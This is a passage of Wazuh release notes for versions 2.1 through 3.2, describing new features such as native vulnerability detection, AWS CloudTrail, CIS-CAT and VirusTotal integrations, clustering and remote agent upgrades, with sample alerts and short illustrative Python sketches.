Finally, some memory leaks and other bugs reported by Coverity have been solved.

Cluster

Several bugs have been fixed in the Wazuh cluster, among them, dealing with too long file paths.

The cluster-control tool was improved to retrieve more information about node types, and it is now possible to enable a debug mode for it.

Agents management

Regarding agent management, the operating system name detection on macOS and old Linux distributions has been fixed, so the needed information is retrieved correctly.

In addition, agent labels are also inserted in JSON archives even when the event does not match any rule.

The API call GET /agents/purgeable/:timeframe has been restructured to add a new field called totalItems. This field contains the number of agents that can be removed.

OpenSSL library

The OpenSSL library has been updated from 1.0.2k to 1.1.0g. This version fixes two security vulnerabilities:

  • CVE-2017-3736: It can allow an attacker to recover the encryption keys used to protect communications.

  • CVE-2017-3735: It can allow a malicious user to perform a one-byte overread.

3.2.0 Release notes - 8 February 2018

This section shows the most relevant new features of Wazuh v3.2.0. You will find more detailed information in our changelog file.

New features:

Vulnerability detection

A native vulnerability detector has been implemented, making use of the agents' new ability to report inventory data (e.g. applications installed, network configuration, hardware information). The manager is now capable of building a vulnerability database, making use of public OVAL repositories (published and maintained by different vendors). This database is used to correlate with the application inventory data reported by agents, identifying packages affected by a CVE.

In version 3.1.0, detecting vulnerabilities was already possible using Wazuh agents integration with Vuls (a third party open source project), but this integration required the installation of additional software on the monitored hosts (adding extra complexity, and making it difficult to manage in a centralized way). Now, in this version, Vuls is not required anymore as this capability is now natively supported using the new agent and manager features.

The new architecture design keeps agents footprint small, not impacting monitored hosts performance or consuming unnecessary resources. Agents just read and report applications installed (RPM, Deb or MSI packages), while the manager is the one that uses the vulnerability database to identify CVEs.

See below an example of results when an application vulnerability is identified:

** Alert 1518102634.685428: - vulnerability-detector,
2018 Feb 08 16:10:34 (PC) ->vulnerability-detector
Rule: 23504 (level 7) -> 'CVE-2017-7226 on Ubuntu 16.04 LTS (xenial) - medium.'
vulnerability.cve: CVE-2017-7226
vulnerability.title: CVE-2017-7226 on Ubuntu 16.04 LTS (xenial) - medium.
vulnerability.severity: Medium
vulnerability.published: 2017-03-22
vulnerability.updated: 2017-03-22
vulnerability.reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7226
vulnerability.rationale: The pe_ILF_object_p function in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.28, is vulnerable to a heap-based buffer over-read of size 4049 because it uses the strlen function instead of strnlen, leading to program crashes in several utilities such as addr2line, size, and strings. It could lead to information disclosure as well.
vulnerability.state: Unfixed
vulnerability.affected_package: binutils
vulnerability.version: 2.26.1-1ubuntu1~16.04.6

You can read more about this new module in the Vulnerability detection section.

Module for AWS Cloudtrail integration

This module provides the ability to read your AWS CloudTrail logs directly from an AWS S3 bucket. Amazon CloudTrail support is now a built-in Wazuh feature, giving you the ability to search, analyze, and generate alerts for AWS CloudTrail events.

Below is an example of the JSON alert generated by this module:

** Alert 1518488581.32874246: - amazon,authentication_success,pci_dss_10.2.5,
2018 Feb 13 02:23:01 manager->Wazuh-AWS
Rule: 80253 (level 3) -> 'Amazon: signin.amazonaws.com - ConsoleLogin - User Login Success.'
aws.eventVersion: 1.05
aws.eventID: 2fb29f0f-4d7f-4384-8170-xxxx
aws.eventTime: 2018-02-13T02:12:26Z
aws.log_file: 1661xxx_CloudTrail_us-east-1_20180xxx_S4Wouyxxx.json.gz
aws.additionalEventData.MFAUsed: No
aws.additionalEventData.LoginTo: https://console.aws.amazon.com/console/home?state=hashArgs%23&isauthcode=true
aws.additionalEventData.MobileVersion: No
aws.eventType: AwsConsoleSignIn
aws.responseElements.ConsoleLogin: Success
aws.awsRegion: us-east-1
aws.eventName: ConsoleLogin
aws.userIdentity.userName: wazuh
aws.userIdentity.type: IAMUser
aws.userIdentity.arn: arn:aws:iam::166157441623:user/wazuh
aws.userIdentity.principalId: AIDAJxxx
aws.userIdentity.accountId: 1661xx4xxx
aws.eventSource: signin.amazonaws.com
aws.userAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
aws.sourceIPAddress: 67.161.xx.xx
aws.recipientAccountId: 166157441623
integration: aws

You can read more about this new module in the AWS CloudTrail section.

CIS-CAT integration now supports Windows OS

In our previous release, the module for integration with the CIS-CAT scanner only supported Linux systems. Now, it also supports Windows systems.

CIS-CAT alerts have also been enriched, and reports are now parsed natively, improving efficiency considerably. Below is an example of an alert:

** Alert 1518508994.718592: - ciscat,
2018 Feb 13 00:03:14 (Windows7) 192.168.1.201->wodle_cis-cat
Rule: 87409 (level 7) -> 'CIS-CAT: (L2) Ensure ‘Prevent Codec Download’ is set to ‘Enabled’ (failed)'
type: scan_result
scan_id: 589117374
cis.rule_id: 19.7.43.2.1
cis.rule_title: (L2) Ensure ‘Prevent Codec Download’ is set to ‘Enabled’
cis.group: Administrative Templates (User)
cis.description: This setting controls whether Windows Media Player is allowed to download additional codecs for decoding media files it does not already understand. The recommended state for this setting is: Enabled.
cis.rationale: This has some potential for risk if a malicious data file is opened in Media Player that requires an additional codec to be installed. If a special codec is required for a necessary job function, then that codec should be tested and supplied by the IT department in the organization.
cis.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: User Configuration\Policies\Administrative Templates\Windows Components\Windows Media Player\Playback\Prevent Codec Download  Impact: The Player is prevented from automatically downloading codecs to your computer. In addition, the Download codecs automatically check box on the Player tab in the Player is not available.
cis.result: fail

Cluster: Ruleset synchronization and performance improvements

Several bugs have been fixed in the cluster, and its general performance has been improved.

The cluster is now able to synchronize decoders, rules, and CDB lists. It also uses the ossec-logtest tool to verify that new rules, decoders, or CDB lists are correctly formatted before sending them to the rest of the cluster nodes.
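A minimal sketch of this validate-before-distributing idea is shown below, assuming the default installation path of ossec-logtest and its test mode; the real synchronization logic is implemented inside the manager.

# Sketch: run ossec-logtest in test mode against the updated ruleset and only
# share it with the other cluster nodes if the check passes. Path and command
# are assumptions based on a default installation.
import subprocess

LOGTEST = "/var/ossec/bin/ossec-logtest"   # assumed default install path

def ruleset_is_valid():
    """Return True if ossec-logtest reports a correctly formatted ruleset."""
    result = subprocess.run([LOGTEST, "-t"], capture_output=True, text=True)
    return result.returncode == 0

if ruleset_is_valid():
    print("Ruleset OK, safe to synchronize to the other cluster nodes")
else:
    print("Ruleset failed validation, keeping the previous version")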

The full list of files synchronized across cluster nodes is:

  • /etc/client.keys

  • /etc/shared

  • /etc/decoders*

  • /etc/rules*

  • /etc/lists*

  • /queue/agent-groups

  • /queue/agent-info

(*) Nodes are restarted when these files are updated.

3.1.0 Release notes - 22 December 2017

This section shows the most relevant new features of Wazuh v3.1.0. You will find more detailed information in our changelog file.

New features:

VULS integration

Vuls (VULnerability Scanner) is a tool created to analyze Linux systems for vulnerabilities. It looks for known vulnerabilities referenced in databases such as the National Vulnerability Database (NVD).

This integration is achieved through the new Command wodle, which allows a command to be run at a specified interval, optionally ignoring its output. The Vuls script is designed to run Vuls on the agent and send the results back to the manager, triggering alerts when a vulnerability is identified.

Below is an example of results where a vulnerability is identified:

** Alert 1513880084.806869: - vuls,
2017 Dec 21 18:14:44 ip-172-31-42-67->Wazuh-VULS
Rule: 22405 (level 10) -> 'High vulnerability CVE-2017-16649 detected in scanning launched on 2017-12-21 18:14:36 with 100% reliability (OvalMatch). Score: 7.200000 (National Vulnerability Database). Affected packages: linux-aws (Not fixable)'
{"KernelVersion": "4.4.0-1044-aws", "Source": "National Vulnerability Database", "LastModified": "2017-11-28 14:05:55", "AffectedPackagesInfo": {"linux-aws": {"Repository": "", "NewVersion": "", "Version": "4.4.0-1044.53", "NewRelease": "", "Release": "", "Fixable": "No", "Arch": ""}}, "integration": "vuls", "ScannedCVE": "CVE-2017-16649", "AffectedPackages": "linux-aws (Not fixable)", "DetectionMethod": "OvalMatch", "Score": 7.2, "Link": "https://nvd.nist.gov/vuln/detail/CVE-2017-16649", "OSversion": "ubuntu 16.04", "Assurance": "100%", "ScanDate": "2017-12-21 18:14:36"}
KernelVersion: 4.4.0-1044-aws
Source: National Vulnerability Database
LastModified: 2017-11-28 14:05:55
AffectedPackagesInfo.linux-aws.Repository: Update
AffectedPackagesInfo.linux-aws.NewVersion:
AffectedPackagesInfo.linux-aws.Version: 4.4.0-1044.53
AffectedPackagesInfo.linux-aws.NewRelease:
AffectedPackagesInfo.linux-aws.Release:
AffectedPackagesInfo.linux-aws.Fixable: No
AffectedPackagesInfo.linux-aws.Arch:
integration: vuls
ScannedCVE: CVE-2017-16649
AffectedPackages: linux-aws (Not fixable)
DetectionMethod: OvalMatch
Score: 7.200000
Link: https://nvd.nist.gov/vuln/detail/CVE-2017-16649
OSversion: ubuntu 16.04
Assurance: 100%
ScanDate: 2017-12-21 18:14:36

CIS-CAT Wazuh module to scan CIS policies

The new CIS-CAT module was developed to evaluate CIS benchmarks on Wazuh agents. This module assesses an agent's compliance with CIS policies to ensure the application of best practices in the security of your IT systems.

With the CIS-CAT wodle, assessments can be scheduled to run periodically, sending reports to the manager and displaying results for each check. A report overview is also displayed, as in the example below:

** Alert 1513886205.7639319: - ciscat,
2017 Dec 21 11:56:45 ubuntu->wodle_cis-cat
Rule: 87411 (level 5) -> 'CIS-CAT Report overview: Score less than 80 % (53 %)'
{"type":"scan_info","scan_id":1222716123,"cis-data":{"benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","hostname":"ubuntu","timestamp":"2017-12-21T11:55:50.143-08:00","score":53}}
type: scan_info
scan_id: 1222716123
cis-data.benchmark: CIS Ubuntu Linux 16.04 LTS Benchmark
cis-data.hostname: ubuntu
cis-data.timestamp: 2017-12-21T11:55:50.143-08:00
cis-data.score: 53

Currently, this module supports only Linux systems; support for Windows systems will be added in future versions.

You will find further information about this new module in the CIS-CAT integration section.

New "Command" Wazuh module

The new Command wodle has been included in this version to allow commands to be run asynchronously, at specified intervals, with an option to ignore their output.
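The snippet below is a conceptual illustration of that behavior (run a command every interval, optionally discarding its output), not the wodle's implementation; the command and interval are arbitrary examples.

# Conceptual sketch of what the Command wodle does: run a configured command
# every INTERVAL seconds and either forward or discard its output.
import subprocess
import time

COMMAND = ["df", "-h"]       # example command; any command could be configured
INTERVAL = 3600              # seconds between runs
IGNORE_OUTPUT = False        # if True, run the command but discard its output

def run_periodically():
    while True:
        result = subprocess.run(COMMAND, capture_output=True, text=True)
        if not IGNORE_OUTPUT:
            # In Wazuh, the output would be forwarded to the manager for analysis.
            print(result.stdout)
        time.sleep(INTERVAL)

if __name__ == "__main__":
    run_periodically()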

The complete configuration guide for this command can be found at Command wodle configuration.

New rotation capabilities for alerts

In large environments, the alerts file may take up a large amount of disk space. To address this, Wazuh 3.1 includes support for rotating the following files by time or size:

  • alerts (plain-text and JSON),

  • archives (plain-text and JSON), and

  • firewall events (plain-text).

Until this release, alert files were rotated once a day. You can now set a more frequent rotation interval (up to a maximum of one day) and specify a maximum file size that triggers the rotation procedure. Rotated files are compressed, signed, and stored in the same way as before.
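The sketch below illustrates the size-based trigger only: when the live alerts file exceeds a threshold, it is compressed and a fresh file is started. The path, threshold, and naming scheme are illustrative, signing is omitted, and Wazuh performs all of this internally according to its configuration.

# Sketch of size-triggered rotation: compress the current file and truncate it
# once it exceeds a configured maximum size. Illustrative values only.
import gzip
import os
import shutil
from datetime import datetime

ALERTS_FILE = "/var/ossec/logs/alerts/alerts.json"  # illustrative path
MAX_SIZE = 100 * 1024 * 1024                        # e.g. rotate at 100 MiB

def rotate_if_needed(path, max_size):
    if not os.path.exists(path) or os.path.getsize(path) < max_size:
        return
    stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
    rotated = f"{path}.{stamp}.gz"
    with open(path, "rb") as src, gzip.open(rotated, "wb") as dst:
        shutil.copyfileobj(src, dst)
    open(path, "w").close()  # truncate the live file

rotate_if_needed(ALERTS_FILE, MAX_SIZE)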

In the <global> section of the Local configuration you will find information on how to configure this feature.

Wazuh API

The Wazuh API has been enhanced with new requests, such as:

  • a request for getting agent information by agent name,

  • a request for purging never-connected or disconnected agents after a defined time frame, and

  • a request for getting purgeable agents.

In addition, more new features can be found in the API changelog.

Ruleset

The Ruleset has been improved to include the necessary rules for the CIS-CAT and VULS integrations.

More information on changes to the Ruleset can be found on the Ruleset changelog.

More relevant features

Additional features have been added to Wazuh 3.1.0 in order to improve its performance, including, but not limited to:

  • a new field in JSON alerts including the timestamp from predecoded logs,

  • the ability for an agent to locally refuse the shared configuration using the agent.remote_conf option, as explained in the Internal configuration section,

  • the immediate stopping of the relevant daemon when a component is disabled,

  • the Syscheck report_changes feature formerly suppressed file change details in alerts when the changes were detected during the first Syscheck scan after an agent restart; file changes are now included whenever textual change data is available, and

  • fixes to reported bugs.

3.0.0 Release notes - 3 December 2017

This section shows the most relevant new features of Wazuh v3.0.0. You will find more detailed information in our changelog file.

For deploying your Wazuh environment see the Installation guide.

New features:

Grouping agents

Support for the grouping of agents has now been included at the Wazuh manager level, which makes centralized configuration more flexible and efficient.

Version 3.0.0 allows agents to be assigned to a specific group, which may have a different agent configuration, rootcheck policies, and hardening checks from other groups. The manager then sends only the necessary files to each agent based on this assignment. Once the new configuration is received, the agent restarts itself to apply the changes.

This group management feature is available from the terminal, using a CLI included in the Wazuh manager, as well as through Wazuh API requests.

More information about this feature can be found at Grouping agents.

Remote agent upgrades

The manager can now upgrade agents remotely. The agent version and OS it is running on are registered with the manager. The manager uses this information to know which agents need to be upgraded and which upgrade package to send.

A custom procedure has been created to perform these upgrades without relying on external package managers (apt/yum). The manager will instead send a compressed and signed WPK (Wazuh Signed Package) that contains the necessary binaries and instructions to upgrade the agent.

The ability to roll back the upgrade is built into the process. If the agent loses connection with the manager after the upgrade, it is automatically rolled back to recover connectivity.
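The sketch below captures only the rollback idea, with hypothetical paths and callbacks standing in for the real upgrade and connectivity checks performed by the WPK upgrade scripts.

# Sketch of the rollback idea: back up the current agent installation, apply
# the upgrade, then verify connectivity; restore the backup if the check fails.
# Paths and callbacks are hypothetical, not the real WPK procedure.
import shutil

AGENT_DIR = "/var/ossec"            # hypothetical agent install path
BACKUP_DIR = "/var/ossec.backup"    # hypothetical backup location

def upgrade_with_rollback(apply_upgrade, manager_reachable):
    """apply_upgrade() installs the new version; manager_reachable() checks
    that the upgraded agent reconnected to the manager."""
    shutil.copytree(AGENT_DIR, BACKUP_DIR, dirs_exist_ok=True)
    apply_upgrade()
    if not manager_reachable():
        # Connectivity lost after upgrading: restore the previous version.
        shutil.rmtree(AGENT_DIR)
        shutil.copytree(BACKUP_DIR, AGENT_DIR)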

WPK files will be generated by Wazuh for every new release. You may also use your own custom WPK files.

In our dedicated section for Remote upgrading, you can find more information about this procedure.

Wazuh cluster for managers

The Wazuh cluster provides a new capability to scale Wazuh horizontally by adding as many manager nodes as needed to process events from the reporting agents.

The cluster architecture is master/client based, synchronizing internal configuration files (agent keys, group configuration, agent configuration, and agent statuses) between all client nodes. This allows agents to report to multiple managers (cluster nodes), which increases availability and fault tolerance.

More information on this new functionality can be found in the dedicated section at Cluster basics.

Automatic decoding for JSON events

The Wazuh manager now includes a native decoder for the JSON format which can read any JSON event and extract its fields dynamically. This new decoder enables Wazuh to use all JSON fields/values for creating rules.

See the JSON decoder section for further information.

Along with this, we introduced a new log format in Logcollector to monitor JSON log files. Custom labels can be included from the endpoint, adding valuable metadata to the monitored JSON logs.

See below for sample configuration:

<localfile>
  <location>/var/log/myapp/log.json</location>
  <log_format>json</log_format>
  <label key="@source">myapp</label>
  <label key="agent.type">webserver</label>
</localfile>

Below is a sample JSON log from the monitored file.

{
  "event": {
    "type": "write",
    "destination": "sample.txt"
  },
  "agent": {
    "name": "web01"
  }
}

The following will be the result when the above configuration is applied to the JSON log:

{
  "event": {
    "type": "write",
    "destination": "sample.txt"
  },
  "agent": {
    "name": "web01",
    "type": "webserver"
  },
  "@source": "myapp"
}
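The merge behavior can be illustrated with a short sketch that reproduces the example above: dotted label keys are nested into the event, plain keys stay at the top level, and existing fields are left untouched. This mimics the observed output and is not the decoder's actual code.

# Sketch of how configured labels end up merged into the decoded JSON event.
import json

event = {
    "event": {"type": "write", "destination": "sample.txt"},
    "agent": {"name": "web01"},
}
labels = {"@source": "myapp", "agent.type": "webserver"}

def apply_labels(evt, lbls):
    for key, value in lbls.items():
        node = evt
        parts = key.split(".")
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node.setdefault(parts[-1], value)  # do not overwrite existing fields
    return evt

print(json.dumps(apply_labels(event, labels), indent=2))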

Information on how to configure this feature can be found in the localfile section of ossec.conf.

VirusTotal Integration

This new version includes an integration with the VirusTotal platform.

This allows the manager to send the hashes of files collected via Syscheck to the VirusTotal API, retrieve the scan results, and generate an alert when there is a positive result.

The integration of VirusTotal as a threat intelligence source, along with the existing FIM capabilities, is a significant improvement to Wazuh's malware detection.
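As an illustration of the lookup the integration performs, the sketch below queries the public VirusTotal API v2 file report endpoint for a hash like the one shown in the example alert below; the API key is a placeholder and error handling is omitted.

# Sketch: query VirusTotal for a file hash collected by Syscheck/FIM and check
# how many engines flagged it. Uses the public VirusTotal API v2.
import requests

API_KEY = "<your-virustotal-api-key>"             # placeholder
FILE_HASH = "9519135089d69ad7ae6b00a78480bb2b"    # md5 from the alert below

response = requests.get(
    "https://www.virustotal.com/vtapi/v2/file/report",
    params={"apikey": API_KEY, "resource": FILE_HASH},
    timeout=30,
)
report = response.json()

if report.get("response_code") == 1 and report.get("positives", 0) > 0:
    print(f"{report['positives']}/{report['total']} engines detected this file")
    print(report["permalink"])
else:
    print("No positives reported for this hash")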

Below is an example of an alert triggered from a positive result:

** Alert 1510684984.55826: mail  - virustotal,
2017 Nov 14 18:43:04 PC->virustotal
Rule: 87105 (level 12) -> 'VirusTotal: Alert - /media/user/software/suspicious-file.exe - 7 engines detected this file'
{"virustotal": {"permalink": "https://www.virustotal.com/file/8604adffc091a760deb4f4d599ab07540c300a0ccb5581de437162e940663a1e/analysis/1510680277/", "sha1": "68b92d885317929e5b283395400ec3322bc9db5e", "malicious": 1, "source": {"alert_id": "1510684983.55139", "sha1": "68b92d885317929e5b283395400ec3322bc9db5e", "file": "/media/user/software/suspicious-file.exe", "agent": {"id": "006", "name": "agent_centos"}, "md5": "9519135089d69ad7ae6b00a78480bb2b"}, "positives": 7, "found": 1, "total": 67, "scan_date": "2017-11-14 17:24:37"}, "integration": "virustotal"}
virustotal.permalink: https://www.virustotal.com/file/8604adffc091a760deb4f4d599ab07540c300a0ccb5581de437162e940663a1e/analysis/1510680277/
virustotal.sha1: 68b92d885317929e5b283395400ec3322bc9db5e
virustotal.malicious: 1
virustotal.source.alert_id: 1510684983.55139
virustotal.source.sha1: 68b92d885317929e5b283395400ec3322bc9db5e
virustotal.source.file: /media/user/software/suspicious-file.exe
virustotal.source.agent.id: 006
virustotal.source.agent.name: agent_centos
virustotal.source.md5: 9519135089d69ad7ae6b00a78480bb2b
virustotal.positives: 7
virustotal.found: 1
virustotal.total: 67
virustotal.scan_date: 2017-11-14 17:24:37
integration: virustotal

The complete documentation of this integration is located at VirusTotal integration section.

MSI Windows installer for agents

A new digitally signed MSI Windows installer has been developed in order to improve the installation process for Windows agents.

This installer can be launched in unattended mode from the command line and combines the agent installation, configuration, registration and connection into a single step.

The procedure for using the MSI installer can be found at Install Wazuh agent on Windows.

Wazuh API

The Wazuh API now includes functionality to manage all the features included in this release, such as:

  • the management of remote agent upgrades,

  • the requests for managing groups, and

  • the management of the new Wazuh Cluster.

In addition, more new features can be found in the API changelog.

Ruleset

The Ruleset has also been improved and now includes the necessary rules for the VirusTotal integration.

For details on changes in the Ruleset, please visit the Ruleset changelog.

Updated external libraries

External libraries used by Wazuh have been updated to improve their integration with our components.

More relevant features

Additional features have been added to Wazuh 3.0.0 in order to improve its performance, including, but not limited to:

  • the ability to choose the cipher suite in the Authd settings,

  • the automatic restarting of an agent when a new shared configuration is received from the manager,

  • the 'pending' state that is now shown for agents that are waiting for a manager response,

  • the ability to configure several managers for each agent, specifying a protocol and port for each, and

  • the new functionality to rotate and compress internal logs by size.

2.x

This section summarizes the most important features of each Wazuh 2.x release.

Wazuh version   Release date
2.1.0           17 August 2017

2.1 Release notes - 17 August 2017

This section shows the most relevant new features of Wazuh v2.1. You will find more detailed information in our changelog file.

New features:

Anti-flooding mechanism

The anti-flooding mechanism is designed to prevent large bursts of events on an agent from negatively impacting the network or the manager. It uses a leaky bucket queue that collects all generated events and sends them to the manager at a rate below a specified events-per-second threshold.
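The sketch below illustrates the leaky bucket idea only: events are queued as they are produced and drained toward the manager at no more than a fixed number per second. The rate, queue size, and send function are illustrative placeholders, not the agent's real values or code.

# Conceptual leaky bucket: enqueue events as produced, drain at a capped rate.
import collections
import time

EPS = 500          # illustrative events-per-second ceiling
QUEUE_SIZE = 5000  # illustrative bucket capacity

bucket = collections.deque()

def collect(event):
    """Called by event producers; new events are dropped if the bucket is full."""
    if len(bucket) < QUEUE_SIZE:
        bucket.append(event)
    # else: the event is discarded (the real agent also warns about flooding)

def send_to_manager(event):
    print("sending:", event)  # stand-in for the agent-to-manager channel

def drain_once():
    """Send at most EPS events, then wait out the remainder of the second."""
    start = time.monotonic()
    for _ in range(min(EPS, len(bucket))):
        send_to_manager(bucket.popleft())
    time.sleep(max(0.0, 1.0 - (time.monotonic() - start)))

# Example: enqueue a burst, then drain it at the capped rate.
for i in range(1200):
    collect(f"event {i}")
while bucket:
    drain_once()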

Learn more about this new mechanism at Anti-flooding mechanism.

Labels for agent alerts

This feature allows agent-specific attributes to be included in each alert. These labels provide a simple way of adding valuable metadata to alert records and can include data points such as who is in charge of a particular agent or the agent's installation date.

For more details about this new feature see our Labels section.

Improved Authd performance

The Authd program has been improved in this version so that the Wazuh API and the manage_agents tool can now register agents while ossec-authd is running.

Additionally, ossec-authd now runs in the background and can be enabled using the command ossec-control enable auth. See the auth section of ossec.conf for configuration options and sample configuration.

Finally, the new force_insert and force_time options in Authd (-F<time> from the ossec-authd command line) allow for the automatic deletion of agents that match the name or IP address of a new agent you are attempting to register.

New features for internal logs

As JSON is one of the most popular logging formats, we have made it possible in this new version to have internal logs written in JSON format, plain text or both. This can be configured in the logging section of ossec.conf.

In addition, we have simplified the management of internal logs: they are now rotated and compressed daily. We have also made it possible to control disk space usage by configuring how long rotated logs are kept before they are automatically deleted.

These parameters are configured in the monitord section of Internal configuration.

Updated external libraries

External libraries used by Wazuh have been updated to improve their integration with our components.

Wazuh API

The /agents request now returns information about the OS, and a specified list of agents can now be restarted or deleted.

Ruleset

The previous Windows decoders extracted the wrong user (the subject user). This has been corrected in this version, and new fields have also been added.